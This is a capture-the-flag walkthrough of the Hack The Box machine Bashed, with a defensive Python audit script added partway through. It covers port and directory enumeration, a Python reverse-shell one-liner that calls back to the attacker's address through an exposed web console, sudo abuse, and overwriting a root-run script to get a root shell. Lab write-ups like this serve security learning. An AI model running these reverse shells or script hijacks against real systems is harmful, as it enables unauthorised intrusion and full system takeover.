[HTB] Bashed

Today we are going to hack the HTB machine called Bashed.

Video


Enumeration


To start, we run nmap to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 10.10.10.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 11:32 CEST
Nmap scan report for 10.10.10.68
Host is up (0.032s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.54 seconds

We see that only port 80 is open. Let's look into it a bit more.

sml@Cassandra:~$ gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.68
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/01 11:33:33 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/dev (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/php (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)
===============================================================
2020/06/01 11:33:50 Finished
===============================================================

Low Shell


We find the /dev directory. If we visit http://10.10.10.68/dev/phpbash.php we can see that a web-based "console" is running. We set nc listening.

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...

And in the web "console" we enter the following line to get a shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We have it...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 4
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

user.txt



$ cd /home
$ ls
arrexel
scriptmanager
$ cd arrexel
$ ls
user.txt
$ cat user.txt
2c281f318555dbc1b856957c7147bfc1

Let's take a look to see what we can do.

$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

We use sudo to obtain the privileges of the scriptmanager user.

$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

Privilege Escalation


We see that there is a directory called /scripts, and that a script in it (test.py) is executed with root privileges (the test.txt it writes is owned by root). We are going to modify it to get another reverse shell, this time with root privileges. We set nc listening...

sml@Cassandra:~$ nc -nlvp 8888
listening on [any] 8888 ...

And off we go :)

scriptmanager@bashed:/$ cd /scripts
scriptmanager@bashed:/scripts$ ls
test.py  test.txt
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
testing 123!
scriptmanager@bashed:/scripts$ ls -l
ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 May  9 15:06 test.txt
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > test.py

After waiting a bit, we have it!

sml@Cassandra:~$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 55334
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
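From the defender's side, the root cause here is a script that root executes while a non-root user owns it. The following audit is an added example, not part of the original writeup: it checks a root-run script and its parent directory for ownership or permission bits that let a non-root account change them. The FileMeta records are constructed from the ls -l output above; the ownership of the /scripts directory itself is an assumption, since the page does not show it.

```python
#!/usr/bin/env python3
"""Audit a script that root executes (e.g. from a root cron job) and report
whether a non-root user could change it. Added example, not from the page."""
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class FileMeta:
    path: str
    uid: int   # owner uid
    gid: int   # owner gid
    mode: int  # permission bits, as returned by stat.S_IMODE(st_mode)


def writable_by_non_root(meta: FileMeta) -> list[str]:
    """Return the reasons a non-root user could modify this path."""
    reasons = []
    if meta.uid != 0:
        reasons.append(f"owned by uid {meta.uid}, not root")
    if meta.mode & stat.S_IWGRP and meta.gid != 0:
        reasons.append(f"group-writable by gid {meta.gid}")
    if meta.mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_root_job(script: FileMeta, parent: FileMeta) -> dict:
    """Check the script and its directory: whoever can write the directory
    can replace the script even when the file itself is root-owned."""
    return {m.path: r for m in (script, parent) if (r := writable_by_non_root(m))}


def from_fs(path: str) -> FileMeta:
    """Build a FileMeta from the live filesystem (for real use)."""
    st = os.stat(path)
    return FileMeta(path, st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))


# Constructed records mirroring the `ls -l` output above: test.py is owned by
# scriptmanager (uid/gid 1001, mode 644) yet root runs it. The ownership of
# /scripts itself is an assumption; the page does not show it.
WEAK_SCRIPT = FileMeta("/scripts/test.py", 1001, 1001, 0o644)
WEAK_DIR = FileMeta("/scripts", 1001, 1001, 0o755)
# The hardened layout: root owns both the script and the directory.
FIXED_SCRIPT = FileMeta("/scripts/test.py", 0, 0, 0o644)
FIXED_DIR = FileMeta("/scripts", 0, 0, 0o755)

if __name__ == "__main__":
    print(audit_root_job(WEAK_SCRIPT, WEAK_DIR))
    print(audit_root_job(FIXED_SCRIPT, FIXED_DIR))  # {} -> nothing to report
```

Run from_fs() on the real script and directory paths to audit a live host; any non-empty result means a lower-privileged account can influence what root executes.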

root.txt



# cd /root
# ls
root.txt
# cat root.txt
cc4f0afe3a1026d402ba10329674a8e2

End


And with this we have the "user" flag and the "root" flag.